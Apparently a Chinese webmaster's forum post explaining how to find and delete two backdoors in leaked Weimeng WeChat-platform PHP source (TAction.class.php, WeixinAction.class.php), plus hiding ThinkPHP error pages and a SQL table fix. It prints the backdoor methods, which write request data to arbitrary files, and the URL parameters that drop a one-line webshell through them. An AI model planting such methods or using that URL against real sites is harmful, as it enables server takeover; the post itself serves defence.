微盟版本漏洞处理二处后门
部分所谓的完整程序有此文件 没有的不要问我为什么没有。
查找文件TAction.class.php
搜索下列代码删除或者注释掉
public function test(){
file_put_contents(base64_decode('dHBsL1VzZXIvZGVmYXVsdC9jb21tb24vaW1hZ2VzL2ZhY2UvMTA0LmdpZg=='),htmlspecialchars($_GET['n']));
}*
执行原理PHP图片注入木马//疑似后门,它生成文件tpl/User/default/common/images/face/104.gif
这个文件虽然是104.gif,但它的内容却是由提交参数写入的。
初步断定木马程序
本人纯属爱好者。不参与注入。也不提供详细注入方法。不要加我QQ问如何黑站谢谢。
另外后门可以写入数据库写入图片文件自己留点心。结合漏洞处理一。做好日常检查。
第二处
后门搜索:WeixinAction.class.php 部分版本有两个此文件
public function test($name, $data)
{
file_put_contents($name, $data);
}
这句话的意思就是在根目录生成文件data可以一句话木马提交注入。
执行原理&m=Weixin&a=test&name=Array&data=一句话木马。
关闭tp错误显示遇错直接显示错误404页面 自定义防止程序路径泄露。查找文件
convention.php
修改
'ERROR_MESSAGE' => '页面错误!请稍后再试~',//错误显示信息,非调试模式有效
'ERROR_PAGE' => '404/404.htm', // 错误定向页面
'TMPL_EXCEPTION_FILE' => THINK_PATH.'404/404.htm',// 异常页面的模板文件
这么做防止用户看见错误详细信息
自己可以在日志文件内找到错误内容。
不多解释 可能存在更多的后门还有更多后门等待挖掘。。
微信源码会员模块问题处理
进服务器高级管理
然后点sQL
CREATE TABLE `tp_member_card_use_record` ( `id` int(10) NOT NULL auto_increment, `itemid` int(10) NOT NULL default '0', `token` varchar(30) NOT NULL default '', `wecha_id` varchar(50) NOT NULL default '', `staffid` int(10) NOT NULL default '0', `cat` smallint(4) NOT NULL default '0', `expense` mediumint(4) NOT NULL default '0', `score` mediumint(4) NOT NULL default '0', `usecount` mediumint(4) NOT NULL default '1', `time` int(10) NOT NULL default '0', PRIMARY KEY (`id`), KEY `itemid` (`itemid`,`cat`), KEY `token` (`token`)) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;
把这个代码复制到里面点执行

已有 623 位网友参与,快来吐槽:
发表评论